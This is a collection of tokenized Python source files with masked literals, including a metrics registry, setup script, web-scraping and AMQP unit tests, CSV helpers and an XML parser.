<NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:2> , 
<NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) } <EOL> _TUPLE2AXES = dict ( ( v , k ) for k , v in _AXES2TUPLE . items ( ) ) <EOL> def vector_norm ( data , axis = None , out = None ) : <EOL> """<STR_LIT>""" <EOL> data = numpy . array ( data , dtype = numpy . float64 , copy = True ) <EOL> if out is None : <EOL> if data . ndim == <NUM_LIT:1> : <EOL> return math . sqrt ( numpy . dot ( data , data ) ) <EOL> data *= data <EOL> out = numpy . atleast_1d ( numpy . sum ( data , axis = axis ) ) <EOL> numpy . sqrt ( out , out ) <EOL> return out <EOL> else : <EOL> data *= data <EOL> numpy . sum ( data , axis = axis , out = out ) <EOL> numpy . sqrt ( out , out ) <EOL> def unit_vector ( data , axis = None , out = None ) : <EOL> """<STR_LIT>""" <EOL> if out is None : <EOL> data = numpy . array ( data , dtype = numpy . float64 , copy = True ) <EOL> if data . ndim == <NUM_LIT:1> : <EOL> data /= math . sqrt ( numpy . dot ( data , data ) ) <EOL> return data <EOL> else : <EOL> if out is not data : <EOL> out [ : ] = numpy . array ( data , copy = False ) <EOL> data = out <EOL> length = numpy . atleast_1d ( numpy . sum ( data * data , axis ) ) <EOL> numpy . sqrt ( length , length ) <EOL> if axis is not None : <EOL> length = numpy . expand_dims ( length , axis ) <EOL> data /= length <EOL> if out is None : <EOL> return data <EOL> def random_vector ( size ) : <EOL> """<STR_LIT>""" <EOL> return numpy . random . random ( size ) <EOL> def inverse_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> return numpy . linalg . inv ( matrix ) <EOL> def concatenate_matrices ( * matrices ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> for i in matrices : <EOL> M = numpy . dot ( M , i ) <EOL> return M <EOL> def is_same_transform ( matrix0 , matrix1 ) : <EOL> """<STR_LIT>""" <EOL> matrix0 = numpy . array ( matrix0 , dtype = numpy . 
float64 , copy = True ) <EOL> matrix0 /= matrix0 [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> matrix1 = numpy . array ( matrix1 , dtype = numpy . float64 , copy = True ) <EOL> matrix1 /= matrix1 [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> return numpy . allclose ( matrix0 , matrix1 ) <EOL> def _import_module ( module_name , warn = True , prefix = '<STR_LIT>' , ignore = '<STR_LIT:_>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> module = __import__ ( module_name ) <EOL> except ImportError : <EOL> if warn : <EOL> warnings . warn ( "<STR_LIT>" + module_name ) <EOL> else : <EOL> for attr in dir ( module ) : <EOL> if ignore and attr . startswith ( ignore ) : <EOL> continue <EOL> if prefix : <EOL> if attr in globals ( ) : <EOL> globals ( ) [ prefix + attr ] = globals ( ) [ attr ] <EOL> elif warn : <EOL> warnings . warn ( "<STR_LIT>" + attr ) <EOL> globals ( ) [ attr ] = getattr ( module , attr ) <EOL> return True </s>
from setuptools import setup

from mastool import extension

# The release download URL is derived from the current package version.
url = '<STR_LIT>'.format(extension.__version__)

setup(
    name='<STR_LIT>',
    packages=['<STR_LIT>'],
    version=extension.__version__,
    description='<STR_LIT>',
    author='<STR_LIT>',
    author_email='<STR_LIT>',
    url='<STR_LIT>',
    download_url=url,
    keywords=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'],
    install_requires=[
        '<STR_LIT>',
        '<STR_LIT>',
    ],
    py_modules=['<STR_LIT>'],
    entry_points={
        '<STR_LIT>': [
            '<STR_LIT>',
        ],
    },
    classifiers=[],
)
import functools
import re
import time
import sys

from .meters import Counter, Histogram, Meter, Timer, Gauge, CallbackGauge, SimpleGauge

# NOTE(review): many string literals below are masked by the tokenizer as
# "<STR_LIT>"; in the original source each masked dict key is distinct.


class MetricsRegistry(object):
    """<STR_LIT>"""

    def __init__(self, clock=time):
        """<STR_LIT>"""
        # One mapping per metric family, all keyed by metric name.
        self._timers = {}
        self._meters = {}
        self._counters = {}
        self._histograms = {}
        self._gauges = {}
        # Injectable time source (anything with .time()), for testability.
        self._clock = clock

    def add(self, key, metric):
        """<STR_LIT>"""
        # Order matters: more specific metric classes are matched before
        # more general ones.
        class_map = (
            (Histogram, self._histograms),
            (Meter, self._meters),
            (Gauge, self._gauges),
            (Timer, self._timers),
            (Counter, self._counters),
        )
        for cls, registry in class_map:
            if isinstance(metric, cls):
                if key in registry:
                    raise LookupError("<STR_LIT>" % key)
                registry[key] = metric
                return
        raise TypeError("<STR_LIT>" % key)

    def counter(self, key):
        """<STR_LIT>"""
        # Lazily create the counter on first use.
        if key not in self._counters:
            self._counters[key] = Counter()
        return self._counters[key]

    def histogram(self, key):
        """<STR_LIT>"""
        if key not in self._histograms:
            self._histograms[key] = Histogram(clock=self._clock)
        return self._histograms[key]

    def gauge(self, key, gauge=None, default=float("<STR_LIT>")):
        # Accept a Gauge instance, a plain callable (wrapped in a
        # CallbackGauge), or nothing (SimpleGauge seeded with *default*).
        if key not in self._gauges:
            if gauge is None:
                gauge = SimpleGauge(default)
            elif not isinstance(gauge, Gauge):
                if not callable(gauge):
                    raise TypeError("<STR_LIT>")
                gauge = CallbackGauge(gauge)
            self._gauges[key] = gauge
        return self._gauges[key]

    def meter(self, key):
        """<STR_LIT>"""
        if key not in self._meters:
            self._meters[key] = Meter(clock=self._clock)
        return self._meters[key]

    def create_sink(self):
        # Hook for subclasses that want timers to report into a sink.
        return None

    def timer(self, key):
        """<STR_LIT>"""
        if key not in self._timers:
            self._timers[key] = Timer(clock=self._clock,
                                      sink=self.create_sink())
        return self._timers[key]

    def clear(self):
        # Drop every registered metric of every family.
        self._meters.clear()
        self._counters.clear()
        self._gauges.clear()
        self._timers.clear()
        self._histograms.clear()

    def _get_counter_metrics(self, key):
        # Snapshot of a single counter, or {} if the key is unknown.
        if key in self._counters:
            counter = self._counters[key]
            return {"count": counter.get_count()}
        return {}

    def _get_gauge_metrics(self, key):
        if key in self._gauges:
            gauge = self._gauges[key]
            return {"value": gauge.get_value()}
        return {}

    def _get_histogram_metrics(self, key):
        if key in self._histograms:
            histogram = self._histograms[key]
            snapshot = histogram.get_snapshot()
            res = {"<STR_LIT>": histogram.get_mean(),
                   "count": histogram.get_count(),
                   "<STR_LIT>": histogram.get_max(),
                   "<STR_LIT>": histogram.get_min(),
                   "<STR_LIT>": histogram.get_stddev(),
                   "<STR_LIT>": snapshot.get_75th_percentile(),
                   "<STR_LIT>": snapshot.get_95th_percentile(),
                   "<STR_LIT>": snapshot.get_99th_percentile(),
                   "<STR_LIT>": snapshot.get_999th_percentile()}
            return res
        return {}

    def _get_meter_metrics(self, key):
        if key in self._meters:
            meter = self._meters[key]
            res = {"count": meter.get_count(),
                   "<STR_LIT>": meter.get_fifteen_minute_rate(),
                   "<STR_LIT>": meter.get_five_minute_rate(),
                   "<STR_LIT>": meter.get_one_minute_rate(),
                   "<STR_LIT>": meter.get_mean_rate()}
            return res
        return {}

    def _get_timer_metrics(self, key):
        if key in self._timers:
            timer = self._timers[key]
            snapshot = timer.get_snapshot()
            res = {"<STR_LIT>": timer.get_mean(),
                   "<STR_LIT>": timer.get_sum(),
                   "count": timer.get_count(),
                   "<STR_LIT>": timer.get_max(),
                   "<STR_LIT>": timer.get_min(),
                   "<STR_LIT>": timer.get_stddev(),
                   "<STR_LIT>": timer.get_fifteen_minute_rate(),
                   "<STR_LIT>": timer.get_five_minute_rate(),
                   "<STR_LIT>": timer.get_one_minute_rate(),
                   "<STR_LIT>": timer.get_mean_rate(),
                   "<STR_LIT>": snapshot.get_median(),
                   "<STR_LIT>": snapshot.get_75th_percentile(),
                   "<STR_LIT>": snapshot.get_95th_percentile(),
                   "<STR_LIT>": snapshot.get_99th_percentile(),
                   "<STR_LIT>": snapshot.get_999th_percentile()}
            return res
        return {}

    def get_metrics(self, key):
        """<STR_LIT>"""
        # A key can only live in one family, so at most one getter
        # contributes a non-empty dict.
        metrics = {}
        for getter in (self._get_counter_metrics, self._get_histogram_metrics,
                       self._get_meter_metrics, self._get_timer_metrics,
                       self._get_gauge_metrics):
            metrics.update(getter(key))
        return metrics

    def dump_metrics(self):
        """<STR_LIT>"""
        metrics = {}
        for metric_type in (self._counters,
                            self._histograms,
                            self._meters,
                            self._timers,
                            self._gauges):
            # Iterating the dict directly yields its keys.
            for key in metric_type:
                metrics[key] = self.get_metrics(key)
        return metrics


class RegexRegistry(MetricsRegistry):
    """<STR_LIT>"""

    def __init__(self, pattern=None, clock=time):
        super(RegexRegistry, self).__init__(clock)
        if pattern is not None:
            self.pattern = re.compile(pattern)
        else:
            self.pattern = re.compile('<STR_LIT>')

    def _get_key(self, key):
        # Collapse the raw key to the non-empty capture groups of every
        # pattern match, joined by '/'.
        matches = self.pattern.finditer(key)
        key = '/'.join(v for match in matches for v in match.groups() if v)
        return key

    def timer(self, key):
        return super(RegexRegistry, self).timer(self._get_key(key))

    def histogram(self, key):
        return super(RegexRegistry, self).histogram(self._get_key(key))

    def counter(self, key):
        return super(RegexRegistry, self).counter(self._get_key(key))

    def gauge(self, key, gauge=None, default=float("<STR_LIT>")):
        # BUG FIX: the *default* argument accepted by MetricsRegistry.gauge
        # was previously dropped by this override; forward it so both
        # registries honour the same signature (backward-compatible).
        return super(RegexRegistry, self).gauge(
            self._get_key(key), gauge, default)

    def meter(self, key):
        return super(RegexRegistry, self).meter(self._get_key(key))


# Process-wide default registry used by the module-level helpers below.
_global_registry = MetricsRegistry()


def global_registry():
    return _global_registry


def set_global_registry(registry):
    global _global_registry
    _global_registry = registry


def counter(key):
    return _global_registry.counter(key)


def histogram(key):
    return _global_registry.histogram(key)


def meter(key):
    return _global_registry.meter(key)


def timer(key):
    return _global_registry.timer(key)


def gauge(key, gauge=None):
    return _global_registry.gauge(key, gauge)


def dump_metrics():
    return _global_registry.dump_metrics()


def clear():
    return _global_registry.clear()


def get_qualname(obj):
    # __qualname__ only exists on Python 3; fall back to __name__ on 2.
    if sys.version_info[0] > 2:
        return obj.__qualname__
    return obj.__name__


def count_calls(fn):
    """<STR_LIT>"""
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        counter("<STR_LIT>" % get_qualname(fn)).inc()
        return fn(*args, **kwargs)
    return wrapper


def meter_calls(fn):
    """<STR_LIT>"""
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        meter("<STR_LIT>" % get_qualname(fn)).mark()
        return fn(*args, **kwargs)
    return wrapper


def hist_calls(fn):
    """<STR_LIT>"""
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        _histogram = histogram("<STR_LIT>" % get_qualname(fn))
        rtn = fn(*args, **kwargs)
        # Only numeric return values are folded into the histogram.
        if type(rtn) in (int, float):
            _histogram.update(rtn)
        return rtn
    return wrapper


def time_calls(fn):
    """<STR_LIT>"""
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        _timer = timer("<STR_LIT>" % get_qualname(fn))
        with _timer.time(fn=get_qualname(fn)):
            return fn(*args, **kwargs)
    return wrapper
# imposm mapping/config flags (relation building, multipolygon handling,
# coordinate caching).  NOTE(review): the numeric thresholds are masked by
# the tokenizer (<NUM_LIT>), so their concrete values cannot be stated
# here — TODO confirm against the original imposm defaults.
<s> import_partial_relations = False <EOL> relation_builder = '<STR_LIT>' <EOL> imposm_multipolygon_report = <NUM_LIT> <EOL> imposm_multipolygon_max_ring = <NUM_LIT:0> <EOL> imposm_linestring_max_length = <NUM_LIT:0> <EOL> imposm_pg_serial_id = True <EOL> imposm_compact_coords_cache = True </s>
<s> import responses <EOL> import unittest2 as unittest <EOL> import livescrape <EOL> class BasePage ( livescrape . ScrapedPage ) : <EOL> scrape_url = "<STR_LIT>" <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> responses . reset ( ) <EOL> responses . add ( <EOL> responses . GET , BasePage . scrape_url , <EOL> """<STR_LIT>""" ) <EOL> responses . start ( ) <EOL> self . addCleanup ( responses . stop ) <EOL> def test_simplecss ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , '<STR_LIT>' ) <EOL> def test_dict ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . _dict , { "<STR_LIT:foo>" : '<STR_LIT>' } ) <EOL> def test_ambigous ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , '<STR_LIT>' ) <EOL> def test_multiple ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> multiple = True ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_attribute ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> attribute = "<STR_LIT>" ) <EOL> not_there = livescrape . Css ( "<STR_LIT>" , <EOL> attribute = "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , '<STR_LIT:1>' ) <EOL> self . assertIsNone ( x . not_there ) <EOL> def test_link ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssLink ( "<STR_LIT:a>" , "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertIsInstance ( x . foo , Page ) <EOL> self . assertEqual ( x . foo . scrape_url , <EOL> "<STR_LIT>" ) <EOL> def test_float ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssFloat ( "<STR_LIT>" ) <EOL> foo_fail = livescrape . 
CssFloat ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertAlmostEqual ( x . foo , <NUM_LIT> ) <EOL> self . assertIsNone ( x . foo_fail ) <EOL> def test_int ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssInt ( "<STR_LIT>" ) <EOL> foo_fail = livescrape . CssInt ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , <NUM_LIT> ) <EOL> self . assertIsNone ( x . foo_fail ) <EOL> def test_date ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssDate ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> foo_fail = livescrape . CssDate ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo . year , <NUM_LIT> ) <EOL> self . assertIsNone ( x . foo_fail ) <EOL> def test_bool ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssBoolean ( "<STR_LIT>" ) <EOL> bar = livescrape . CssBoolean ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertTrue ( x . foo ) <EOL> self . assertFalse ( x . bar ) <EOL> def test_raw ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssRaw ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , "<STR_LIT>" ) <EOL> def test_complex ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssMulti ( <EOL> "<STR_LIT>" , <EOL> key = livescrape . Css ( "<STR_LIT>" ) , <EOL> value = livescrape . Css ( "<STR_LIT>" ) ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , [ { "<STR_LIT:key>" : "<STR_LIT:key>" , "<STR_LIT:value>" : "<STR_LIT:value>" } , <EOL> { "<STR_LIT:key>" : "<STR_LIT>" , "<STR_LIT:value>" : "<STR_LIT>" } ] ) <EOL> def test_group ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssGroup ( "<STR_LIT>" , multiple = True ) <EOL> foo . key = livescrape . Css ( "<STR_LIT>" ) <EOL> foo . value = livescrape . Css ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] [ "<STR_LIT:key>" ] , "<STR_LIT:key>" ) <EOL> self . assertEqual ( x . 
foo [ <NUM_LIT:0> ] [ "<STR_LIT:value>" ] , "<STR_LIT:value>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:1> ] [ "<STR_LIT:key>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:1> ] [ "<STR_LIT:value>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] . key , "<STR_LIT:key>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] . value , "<STR_LIT:value>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:1> ] . key , "<STR_LIT>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:1> ] . value , "<STR_LIT>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] . _dict ( ) , <EOL> { "<STR_LIT:key>" : "<STR_LIT:key>" , "<STR_LIT:value>" : "<STR_LIT:value>" } ) <EOL> self . assertEqual ( [ x for x in dir ( x . foo [ <NUM_LIT:1> ] ) <EOL> if x [ <NUM_LIT:0> ] != "<STR_LIT:_>" ] , <EOL> [ "<STR_LIT:key>" , "<STR_LIT:value>" ] ) <EOL> with self . assertRaises ( AttributeError ) : <EOL> x . foo [ <NUM_LIT:0> ] . nonexistent <EOL> def test_cleanup ( self ) : <EOL> cleanup_args = [ None ] <EOL> def cleanup ( x ) : <EOL> self . assertIsNone ( cleanup_args [ <NUM_LIT:0> ] ) <EOL> cleanup_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> cleanup = cleanup ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , "<STR_LIT>" ) <EOL> self . assertEqual ( cleanup_args [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> def test_extract ( self ) : <EOL> extract_args = [ None ] <EOL> def extract ( x ) : <EOL> self . assertIsNone ( extract_args [ <NUM_LIT:0> ] ) <EOL> extract_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> extract = extract ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , "<STR_LIT>" ) <EOL> self . assertEqual ( extract_args [ <NUM_LIT:0> ] . 
text , "<STR_LIT>" ) <EOL> def test_cleanup_extract ( self ) : <EOL> cleanup_args = [ None ] <EOL> extract_args = [ None ] <EOL> def cleanup ( x ) : <EOL> self . assertIsNone ( cleanup_args [ <NUM_LIT:0> ] ) <EOL> cleanup_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> def extract ( x ) : <EOL> self . assertIsNone ( extract_args [ <NUM_LIT:0> ] ) <EOL> extract_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> cleanup = cleanup , <EOL> extract = extract ) <EOL> x = Page ( ) <EOL> value = x . foo <EOL> self . assertEqual ( extract_args [ <NUM_LIT:0> ] . text , "<STR_LIT>" ) <EOL> self . assertEqual ( cleanup_args [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . assertEqual ( value , "<STR_LIT>" ) <EOL> def test_decorator ( self ) : <EOL> cleanup_args = [ None ] <EOL> extract_args = [ None ] <EOL> method_args = [ None ] <EOL> def cleanup ( x ) : <EOL> self . assertIsNone ( cleanup_args [ <NUM_LIT:0> ] ) <EOL> cleanup_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> def extract ( x ) : <EOL> self . assertIsNone ( extract_args [ <NUM_LIT:0> ] ) <EOL> extract_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> class Page ( BasePage ) : <EOL> @ livescrape . Css ( "<STR_LIT>" , <EOL> cleanup = cleanup , <EOL> extract = extract ) <EOL> def foo ( self , value , element ) : <EOL> method_args [ <NUM_LIT:0> ] = ( value , element ) <EOL> return "<STR_LIT>" <EOL> x = Page ( ) <EOL> value = x . foo <EOL> self . assertEqual ( extract_args [ <NUM_LIT:0> ] . text , "<STR_LIT>" ) <EOL> self . assertEqual ( cleanup_args [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . assertEqual ( method_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . assertEqual ( method_args [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . text , "<STR_LIT>" ) <EOL> self . 
assertEqual ( value , "<STR_LIT>" ) <EOL> def test_headers ( self ) : <EOL> class Page ( BasePage ) : <EOL> scrape_headers = { "<STR_LIT:foo>" : "<STR_LIT:bar>" } <EOL> Page ( ) . scrape_fetch ( BasePage . scrape_url ) <EOL> self . assertEqual ( len ( responses . calls ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( responses . calls [ <NUM_LIT:0> ] . request . headers [ '<STR_LIT>' ] , <EOL> '<STR_LIT:bar>' ) <EOL> def test_referer ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssLink ( "<STR_LIT:a>" , "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertIsInstance ( x . foo , Page ) <EOL> responses . add ( <EOL> responses . GET , x . foo . scrape_url , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNone ( x . foo . foo ) <EOL> self . assertEqual ( len ( responses . calls ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( responses . calls [ <NUM_LIT:1> ] . request . headers [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_custom_referer ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssLink ( "<STR_LIT:a>" , "<STR_LIT>" , referer = "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertIsInstance ( x . foo , Page ) <EOL> responses . add ( <EOL> responses . GET , x . foo . scrape_url , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNone ( x . foo . foo ) <EOL> self . assertEqual ( len ( responses . calls ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( responses . calls [ <NUM_LIT:1> ] . request . headers [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_no_referer ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssLink ( "<STR_LIT:a>" , "<STR_LIT>" , referer = False ) <EOL> x = Page ( ) <EOL> self . assertIsInstance ( x . foo , Page ) <EOL> responses . add ( <EOL> responses . GET , x . foo . scrape_url , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNone ( x . foo . foo ) <EOL> self . assertEqual ( len ( responses . calls ) , <NUM_LIT:2> ) <EOL> self . assertNotIn ( "<STR_LIT>" , responses . calls [ <NUM_LIT:1> ] . request . 
headers ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import csv <EOL> import sys <EOL> def last_index ( list_ , value ) : <EOL> """<STR_LIT>""" <EOL> found = None <EOL> for index , val in enumerate ( list_ ) : <EOL> if val == value : <EOL> found = index <EOL> if found is None : <EOL> raise ValueError ( "<STR_LIT>" . format ( value , list_ ) ) <EOL> return found <EOL> def abort ( message = None ) : <EOL> if message is not None : <EOL> print >> sys . stderr , message <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def csv_list ( value ) : <EOL> for line in csv . reader ( [ value ] , skipinitialspace = True ) : <EOL> return line <EOL> def csv_dict ( value ) : <EOL> for line in csv . reader ( [ value ] , skipinitialspace = True ) : <EOL> return dict ( kv . split ( '<STR_LIT:=>' ) for kv in line ) </s>
<s> from nameko . events import event_handler <EOL> from nameko . standalone . events import event_dispatcher <EOL> from nameko . testing . services import entrypoint_waiter <EOL> class ServiceB ( object ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> @ event_handler ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def handle_event ( self , payload ) : <EOL> print ( "<STR_LIT>" , payload ) <EOL> def test_event_interface ( container_factory , rabbit_config ) : <EOL> container = container_factory ( ServiceB , rabbit_config ) <EOL> container . start ( ) <EOL> dispatch = event_dispatcher ( rabbit_config ) <EOL> with entrypoint_waiter ( container , '<STR_LIT>' ) : <EOL> dispatch ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" </s>
<s> import socket <EOL> import pytest <EOL> from urllib3 . util import parse_url , Url <EOL> from nameko . amqp import verify_amqp_uri <EOL> @ pytest . fixture <EOL> def uris ( rabbit_config ) : <EOL> amqp_uri = rabbit_config [ '<STR_LIT>' ] <EOL> scheme , auth , host , port , path , _ , _ = parse_url ( amqp_uri ) <EOL> bad_port = Url ( scheme , auth , host , port + <NUM_LIT:1> , path ) . url <EOL> bad_user = Url ( scheme , '<STR_LIT>' , host , port , path ) . url <EOL> bad_vhost = Url ( scheme , auth , host , port , '<STR_LIT>' ) . url <EOL> return { <EOL> '<STR_LIT>' : amqp_uri , <EOL> '<STR_LIT>' : bad_port , <EOL> '<STR_LIT>' : bad_user , <EOL> '<STR_LIT>' : bad_vhost , <EOL> } <EOL> def test_good ( uris ) : <EOL> amqp_uri = uris [ '<STR_LIT>' ] <EOL> verify_amqp_uri ( amqp_uri ) <EOL> def test_bad_user ( uris ) : <EOL> amqp_uri = uris [ '<STR_LIT>' ] <EOL> with pytest . raises ( IOError ) as exc_info : <EOL> verify_amqp_uri ( amqp_uri ) <EOL> message = str ( exc_info . value ) <EOL> assert '<STR_LIT>' in message <EOL> assert '<STR_LIT>' in message <EOL> def test_bad_vhost ( uris ) : <EOL> amqp_uri = uris [ '<STR_LIT>' ] <EOL> with pytest . raises ( IOError ) as exc_info : <EOL> verify_amqp_uri ( amqp_uri ) <EOL> message = str ( exc_info . value ) <EOL> assert '<STR_LIT>' in message <EOL> assert '<STR_LIT>' in message <EOL> def test_other_error ( uris ) : <EOL> amqp_uri = uris [ '<STR_LIT>' ] <EOL> with pytest . raises ( socket . error ) : <EOL> verify_amqp_uri ( amqp_uri ) </s>
<s> '''<STR_LIT>''' <EOL> import xml . dom . minidom <EOL> __all__ = ( '<STR_LIT>' , ) <EOL> class XMLNode : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . name = "<STR_LIT>" <EOL> self . text = "<STR_LIT>" <EOL> self . attrib = { } <EOL> self . xml = None <EOL> def __setitem__ ( self , key , item ) : <EOL> """<STR_LIT>""" <EOL> self . attrib [ key ] = item <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . attrib [ key ] <EOL> @ classmethod <EOL> def __parse_element ( cls , element , this_node ) : <EOL> """<STR_LIT>""" <EOL> this_node . name = element . nodeName <EOL> for i in range ( element . attributes . length ) : <EOL> an = element . attributes . item ( i ) <EOL> this_node [ an . name ] = an . nodeValue <EOL> for a in element . childNodes : <EOL> if a . nodeType == xml . dom . Node . ELEMENT_NODE : <EOL> child = XMLNode ( ) <EOL> if not hasattr ( this_node , a . nodeName ) or a . nodeName == '<STR_LIT:name>' : <EOL> setattr ( this_node , a . nodeName , [ ] ) <EOL> children = getattr ( this_node , a . nodeName ) <EOL> children . append ( child ) <EOL> cls . __parse_element ( a , child ) <EOL> elif a . nodeType == xml . dom . Node . TEXT_NODE : <EOL> this_node . text += a . nodeValue <EOL> return this_node <EOL> @ classmethod <EOL> def parse ( cls , xml_str , store_xml = False ) : <EOL> """<STR_LIT>""" <EOL> dom = xml . dom . minidom . parseString ( xml_str ) <EOL> root_node = XMLNode ( ) <EOL> if store_xml : <EOL> root_node . xml = xml_str <EOL> return cls . __parse_element ( dom . firstChild , root_node ) </s>
<s> CHUNK = b'<STR_LIT:C>' <EOL> FILE = b'<STR_LIT:F>' <EOL> ERROR = b'<STR_LIT:E>' <EOL> OK = b'<STR_LIT:O>' </s>
